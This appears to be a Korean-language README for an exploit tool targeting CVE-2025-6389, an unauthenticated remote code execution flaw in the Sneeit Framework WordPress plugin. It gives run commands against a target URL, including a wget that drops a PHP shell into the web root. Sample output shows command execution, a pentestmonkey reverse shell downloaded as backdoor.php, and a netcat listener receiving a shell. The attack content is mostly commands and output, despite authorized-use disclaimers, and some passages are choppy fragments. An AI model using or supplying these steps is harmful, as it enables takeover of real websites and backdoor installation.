
CVE-2025-6389
wp_vul_theme
CVE-2025-6389는 인기 테마에서 널리 사용되는 Sneeit Framework 워드프레스 플러그인(≤ 8.3)의 치명적(CVSS 9.8) 취약점입니다. 이 취약점은 인증 없는 원격 코드 실행을 허용합니다 — 웹 취약점 중 가장 위험한 유형입니다.
# Install dependencies
pip3 install requests colorama
# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com
# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
assert + die 덕분)이 도구는 공식적으로 승인된 대상(명확한 범위 + RoE)에서만 사용하세요. 이 취약점은 현재도 야생에서 활발히 악용되고 있습니다.
익스플로잇이 실제로 작동할 때 터미널에서 볼 수 있는 내용입니다 (Sneeit Framework ≤ 8.3을 실행하는 취약한 대상에서 CVE-2025-6389의 100% 성공적인 익스플로잇):
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (full phpinfo() page continues for thousands of lines)
RCE $> whoami
[+] Output:
www-data
RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Output:
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’
backdoor.php 100%[===================>] 5.37K --.-KB/s in 0.001s
그런 다음 자신의 머신에서:
nc -lvnp 4444
→ www-data로 완전한 대화형 리버스 셸을 즉시 획득합니다.
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)
다음 중 하나라도 나타나면 성공한 것입니다:
그게 전부입니다. 위 중 하나라도 나타나면 → 인증 없는 완전한 RCE 달성.
작동 여부를 100% 확인받고 싶다면 정확한 출력을 여기에 붙여넣으세요.
sneeit_articles_pagination_callback()call_user_func()에 전달되어 임의 코드 실행 발생이 정보는 방어 및 교육 목적으로만 제공됩니다 🛡️. 소유하지 않거나 명시적 테스트 허가가 없는 시스템을 악용하는 데 사용하지 마세요 🚫. 보안 취약점을 다룰 때는 항상 법적 및 윤리적 지침을 따르세요 ⚖️✨